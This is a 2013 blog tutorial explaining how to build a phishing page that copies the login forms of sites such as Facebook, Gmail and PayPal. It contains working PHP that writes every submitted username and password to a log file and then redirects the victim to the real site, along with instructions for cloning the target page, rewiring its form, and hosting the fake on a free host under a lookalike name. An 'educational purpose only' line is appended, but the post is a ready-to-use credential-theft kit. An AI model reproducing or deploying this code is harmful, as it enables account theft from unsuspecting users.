27 May 2013

How to creating a fake ( Phishing ) page of gmail, paypal, facebook ,yahoo, etc

Enough about Android now we should move on to hacking. Phishing has become a very easy to use trick to hack usernames and passwords of users. Here i am going to demonstrate how to create a fake phishing page for almost any social networking site , email or any other site that has a login form.
For this trick you would need a hosting account , you can get that easily.
Register yourself at t35, host1free, 110mb etc.
Note- 110mb checks for phishing page on their site and removes them.
So now u have a hosting account so lets create a fake page-
First go to the target site. In your browser select Save As from the File menu and save the site on
 your hardisk with name "login.htm" .
or alternatively right click on the page and click "view source" and copy all of it and save them to a notepad file. Rename the file with "login.htm".
Now the second part of the hack-
Go to Notepad and copy this into it-

<?php
header ('Location: http://www.facebook.com');
$handle = fopen("log.txt", "a");
foreach($_POST as $variable => $value)
 {
   fwrite($handle, $variable);
   fwrite($handle, "=");
   fwrite($handle, $value);
   fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

Replace facebook.com with the URL you want the user to go after he click on submit button.
Save the page as fish.php
Now you need to edit the "login.htm" file we save earlier. So go to that and open it with notepad.
now search for any htm like "action=" which has something with login. And replace the URL with "fish.php".
Also create a blank txt file with name "log.txt". This file would be used to save your logins and passwords.
Now you are done,
Go to your hosting account and upload all the files to your server.
Now go to the URL provided by your host.
Like - http://g00glepage.t35.com/login.htm
And you would see the fake page as it is.
Now enter the username and password.
Check the log.txt file. The password and username you entered previously would be saved in the log.txt file including other details such as time stamp.
Here you have a working phishing page

Note:- For this trick require website on which you have to put three file fish.php,login.html,log.txt (where your password will be store). This tutorial is for educational purpose only.